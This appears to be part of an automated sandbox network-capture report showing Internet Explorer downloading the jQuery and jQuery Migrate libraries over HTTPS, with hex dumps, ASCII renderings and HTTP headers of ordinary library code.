                                                                                              Data Ascii: 2bd8/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],functio
                                                                                              2021-12-13 23:57:32 UTC8559INData Raw: 74 65 57 61 72 6e 69 6e 67 73 3d 5b 5d 2c 76 6f 69 64 20 30 3d 3d 3d 73 2e 6d 69 67 72 61 74 65 54 72 61 63 65 26 26 28 73 2e 6d 69 67 72 61 74 65 54 72 61 63 65 3d 21 30 29 2c 73 2e 6d 69 67 72 61 74 65 52 65 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 3d 7b 7d 2c 73 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 2e 6c 65 6e 67 74 68 3d 30 7d 2c 22 42 61 63 6b 43 6f 6d 70 61 74 22 3d 3d 3d 6e 2e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6d 70 61 74 4d 6f 64 65 26 26 75 28 22 6a 51 75 65 72 79 20 69 73 20 6e 6f 74 20 63 6f 6d 70 61 74 69 62 6c 65 20 77 69 74 68 20 51 75 69 72 6b 73 20 4d 6f 64 65 22 29 3b 76 61 72 20 69 2c 61 2c 63 2c 64 3d 7b 7d 2c 6c 3d 73 2e 66 6e 2e 69 6e 69 74 2c 70 3d 73 2e 66 69 6e 64 2c 66 3d 2f 5c 5b 28 5c 73 2a 5b 2d 5c 77 5d 2b 5c
                                                                                              Data Ascii: teWarnings=[],void 0===s.migrateTrace&&(s.migrateTrace=!0),s.migrateReset=function(){r={},s.migrateWarnings.length=0},"BackCompat"===n.document.compatMode&&u("jQuery is not compatible with Quirks Mode");var i,a,c,d={},l=s.fn.init,p=s.find,f=/\[(\s*[-\w]+\
                                                                                              2021-12-13 23:57:32 UTC8561INData Raw: 79 2e 75 6e 69 71 75 65 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 75 6e 69 71 75 65 53 6f 72 74 22 29 2c 74 28 73 2e 65 78 70 72 2c 22 66 69 6c 74 65 72 73 22 2c 73 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 22 6a 51 75 65 72 79 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 22 29 2c 74 28 73 2e 65 78 70 72 2c 22 3a 22 2c 73 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 22 6a 51 75 65 72 79 2e 65 78 70 72 5b 27 3a 27 5d 20 69 73 20 64 65 70 72 65 63 61 74 65 64 3b 20 75 73 65 20 6a 51 75 65 72 79 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 22 29 2c 65 28 22 33 2e 31 2e 31 22 29 26 26 6f 28 73 2c 22 74 72 69 6d 22 2c 66
                                                                                              Data Ascii: y.unique is deprecated; use jQuery.uniqueSort"),t(s.expr,"filters",s.expr.pseudos,"jQuery.expr.filters is deprecated; use jQuery.expr.pseudos"),t(s.expr,":",s.expr.pseudos,"jQuery.expr[':'] is deprecated; use jQuery.expr.pseudos"),e("3.1.1")&&o(s,"trim",f
                                                                                              2021-12-13 23:57:32 UTC8562INData Raw: 73 73 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 22 29 2c 6f 28 65 2c 22 65 72 72 6f 72 22 2c 65 2e 66 61 69 6c 2c 22 6a 51 58 48 52 2e 65 72 72 6f 72 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 22 29 2c 6f 28 65 2c 22 63 6f 6d 70 6c 65 74 65 22 2c 65 2e 61 6c 77 61 79 73 2c 22 6a 51 58 48 52 2e 63 6f 6d 70 6c 65 74 65 20 69 73 20 64 65 70 72 65 63 61 74 65 64 20 61 6e 64 20 72 65 6d 6f 76 65 64 22 29 29 2c 65 7d 2c 65 28 22 34 2e 30 2e 30 22 29 7c 7c 73 2e 61 6a 61 78 50 72 65 66 69 6c 74 65 72 28 22 2b 6a 73 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 21 31 21 3d 3d 65 2e 6a 73 6f 6e 70 26 26 28 63 2e 74 65 73 74 28 65 2e 75 72 6c 29 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65
                                                                                              Data Ascii: ss is deprecated and removed"),o(e,"error",e.fail,"jQXHR.error is deprecated and removed"),o(e,"complete",e.always,"jQXHR.complete is deprecated and removed")),e},e("4.0.0")||s.ajaxPrefilter("+json",function(e){!1!==e.jsonp&&(c.test(e.url)||"string"==type
                                                                                              2021-12-13 23:57:32 UTC8563INData Raw: 6b 73 5b 74 5d 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 62 3d 21 30 2c 65 3d 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 62 3d 21 31 2c 65 7d 29 7d 29 2c 73 2e 73 77 61 70 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 6f 2c 69 2c 61 3d 7b 7d 3b 66 6f 72 28 69 20 69 6e 20 62 7c 7c 75 28 22 6a 51 75 65 72 79 2e 73 77 61 70 28 29 20 69 73 20 75 6e 64 6f 63 75 6d 65 6e 74 65 64 20 61 6e 64 20 64 65 70 72 65 63 61 74 65 64 22 29 2c 74 29 61 5b 69 5d 3d 65 2e 73 74 79 6c 65 5b 69 5d 2c 65 2e 73 74 79 6c 65 5b 69 5d 3d 74 5b 69 5d 3b 66 6f 72 28 69 20 69 6e 20 6f 3d 72 2e 61 70 70 6c 79 28 65 2c 6e 7c 7c 5b 5d 29 2c 74 29 65 2e 73 74 79 6c 65 5b 69 5d 3d 61 5b 69 5d
                                                                                              Data Ascii: ks[t].get=function(){var e;return b=!0,e=r.apply(this,arguments),b=!1,e})}),s.swap=function(e,t,r,n){var o,i,a={};for(i in b||u("jQuery.swap() is undocumented and deprecated"),t)a[i]=e.style[i],e.style[i]=t[i];for(i in o=r.apply(e,n||[]),t)e.style[i]=a[i]
                                                                                              2021-12-13 23:57:32 UTC8565INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 31 3c 73 2e 65 61 73 69 6e 67 5b 74 68 69 73 2e 65 61 73 69 6e 67 5d 2e 6c 65 6e 67 74 68 26 26 28 75 28 22 27 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 22 2b 74 68 69 73 2e 65 61 73 69 6e 67 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 27 20 73 68 6f 75 6c 64 20 75 73 65 20 6f 6e 6c 79 20 6f 6e 65 20 61 72 67 75 6d 65 6e 74 22 29 2c 73 2e 65 61 73 69 6e 67 5b 74 68 69 73 2e 65 61 73 69 6e 67 5d 3d 4d 29 2c 53 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 41 3d 73 2e 66 78 2e 69 6e 74 65 72 76 61 6c 7c 7c 31 33 2c 6b 3d 22 6a 51 75 65 72 79 2e 66 78 2e 69 6e 74 65 72 76 61 6c 20 69 73 20 64 65 70 72 65 63 61 74 65 64 22 2c 6e 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 26 26 4f
                                                                                              Data Ascii: =function(){1<s.easing[this.easing].length&&(u("'jQuery.easing."+this.easing.toString()+"' should use only one argument"),s.easing[this.easing]=M),S.apply(this,arguments)},A=s.fx.interval||13,k="jQuery.fx.interval is deprecated",n.requestAnimationFrame&&O
                                                                                              2021-12-13 23:57:32 UTC8566INData Raw: 22 29 2c 65 2e 73 70 6c 69 63 65 28 30 2c 30 2c 74 29 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 74 68 69 73 2e 6f 6e 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 3a 28 74 68 69 73 2e 74 72 69 67 67 65 72 48 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 2c 74 68 69 73 29 29 7d 7d 29 2c 73 2e 65 61 63 68 28 22 62 6c 75 72 20 66 6f 63 75 73 20 66 6f 63 75 73 69 6e 20 66 6f 63 75 73 6f 75 74 20 72 65 73 69 7a 65 20 73 63 72 6f 6c 6c 20 63 6c 69 63 6b 20 64 62 6c 63 6c 69 63 6b 20 6d 6f 75 73 65 64 6f 77 6e 20 6d 6f 75 73 65 75 70 20 6d 6f 75 73 65 6d 6f 76 65 20 6d 6f 75 73 65 6f 76 65 72 20 6d 6f 75 73 65 6f 75 74 20 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 20 63 68 61 6e 67 65 20 73 65 6c 65 63 74 20 73 75 62 6d
                                                                                              Data Ascii: "),e.splice(0,0,t),arguments.length?this.on.apply(this,e):(this.triggerHandler.apply(this,e),this))}}),s.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select subm
                                                                                              2021-12-13 23:57:32 UTC8567INData Raw: 29 7d 76 61 72 20 4f 3d 2f 3c 28 3f 21 61 72 65 61 7c 62 72 7c 63 6f 6c 7c 65 6d 62 65 64 7c 68 72 7c 69 6d 67 7c 69 6e 70 75 74 7c 6c 69 6e 6b 7c 6d 65 74 61 7c 70 61 72 61 6d 29 28 28 5b 61 2d 7a 5d 5b 5e 5c 2f 5c 30 3e 5c 78 32 30 5c 74 5c 72 5c 6e 5c 66 5d 2a 29 5b 5e 3e 5d 2a 29 5c 2f 3e 2f 67 69 2c 71 3d 73 2e 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3b 73 2e 55 4e 53 41 46 45 5f 72 65 73 74 6f 72 65 4c 65 67 61 63 79 48 74 6d 6c 50 72 65 66 69 6c 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 50 28 65 29 2c 65 2e 72 65 70 6c 61 63 65 28 4f 2c 22 3c 24 31 3e 3c 2f 24 32 3e 22 29 7d 7d 2c 73 2e 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 3d 66 75 6e 63 74
                                                                                              Data Ascii: )}var O=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi,q=s.htmlPrefilter;s.UNSAFE_restoreLegacyHtmlPrefilter=function(){s.htmlPrefilter=function(e){return P(e),e.replace(O,"<$1></$2>")}},s.htmlPrefilter=funct
                                                                                              2021-12-13 23:57:32 UTC8569INData Raw: 6e 28 29 7b 76 61 72 20 65 3d 72 26 26 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 2e 70 72 6f 6d 69 73 65 3f 65 2e 70 72 6f 6d 69 73 65 28 29 2e 64 6f 6e 65 28 6e 2e 72 65 73 6f 6c 76 65 29 2e 66 61 69 6c 28 6e 2e 72 65 6a 65 63 74 29 2e 70 72 6f 67 72 65 73 73 28 6e 2e 6e 6f 74 69 66 79 29 3a 6e 5b 74 5b 30 5d 2b 22 57 69 74 68 22 5d 28 74 68 69 73 3d 3d 3d 61 3f 6e 2e 70 72 6f 6d 69 73 65 28 29 3a 74 68 69 73 2c 72 3f 5b 65 5d 3a 61 72 67 75 6d 65 6e 74 73 29 7d 29 7d 29 2c 6f 3d 6e 75 6c 6c 7d 29 2e 70 72 6f 6d 69 73 65 28 29 7d 2c 65 26 26 65 2e 63 61 6c 6c 28 69 2c 69 29 2c 69 7d 2c 73 2e 44 65 66 65 72 72 65 64 2e 65 78 63 65 70 74 69 6f 6e 48 6f 6f 6b
                                                                                              Data Ascii: n(){var e=r&&r.apply(this,arguments);e&&"function"==typeof e.promise?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[t[0]+"With"](this===a?n.promise():this,r?[e]:arguments)})}),o=null}).promise()},e&&e.call(i,i),i},s.Deferred.exceptionHook
                                                                                              2021-12-13 23:57:32 UTC8569INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              18192.168.2.349778104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8502OUTGET /wp/c/5.8.2/wp-includes/js/jquery/jquery.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8569INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a6b9432b29-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176211
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"36c802f7aaae401ed853a06a97143f5561f64f41760c2eecd3154321da326f54"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-sjc10055-SJC, cache-fra19140-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8570INData Raw: 37 63 39 39 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                              Data Ascii: 7c99/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                              2021-12-13 23:57:32 UTC8570INData Raw: 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 2e 69 74 65 6d 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 65 3d 3d 3d 65 2e 77 69 6e 64 6f 77 7d 2c 45 3d 43 2e 64 6f 63 75 6d 65 6e 74 2c
                                                                                              Data Ascii: [],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,
                                                                                              2021-12-13 23:57:32 UTC8572INData Raw: 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73
                                                                                              Data Ascii: ){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},pus
                                                                                              2021-12-13 23:57:32 UTC8573INData Raw: 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3d 69 2c 65 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 65 2e 6c 65 6e 67 74 68
                                                                                              Data Ascii: )?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length
                                                                                              2021-12-13 23:57:32 UTC8574INData Raw: 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4d 2b 22 2b 24 22 2c 22 67 22 29 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2a 2c 22 2b 4d 2b 22 2a 22 29 2c 7a 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2a 28 5b 3e 2b 7e 5d 7c 22 2b 4d 2b 22 29 22 2b 4d 2b 22
                                                                                              Data Ascii: \\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new RegExp("^"+M+"*,"+M+"*"),z=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"
                                                                                              2021-12-13 23:57:32 UTC8576INData Raw: 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4c 2e 61 70 70 6c 79 28 65 2c 4f 2e 63 61 6c 6c 28 74 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 6c 65 6e 67 74 68 2c 72 3d 30 3b 77 68 69 6c 65 28 65 5b 6e 2b 2b 5d 3d 74 5b 72 2b 2b 5d 29 3b 65 2e 6c 65
                                                                                              Data Ascii: ame.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.le
                                                                                              2021-12-13 23:57:32 UTC8577INData Raw: 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 73 70 6c 69 74 28 22 7c 22 29 2c 72 3d 6e 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 72 2d 2d 29 62 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 5b 72 5d 5d 3d 74 7d 66 75 6e 63
                                                                                              Data Ascii: unction le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){var n=e.split("|"),r=n.length;while(r--)b.attrHandle[n[r]]=t}func
                                                                                              2021-12-13 23:57:32 UTC8578INData Raw: 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 71 75
                                                                                              Data Ascii: ent,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(e).appendChild(C.createElement("div")),"undefined"!=typeof e.qu
                                                                                              2021-12-13 23:57:32 UTC8580INData Raw: 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3b 69 66 28 22 2a 22 3d 3d 3d 65 29 7b 77 68 69 6c 65 28 6e 3d 6f 5b 69 2b 2b 5d 29 31 3d 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20
                                                                                              Data Ascii: ntsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1===n.nodeType&&r.push(n);return
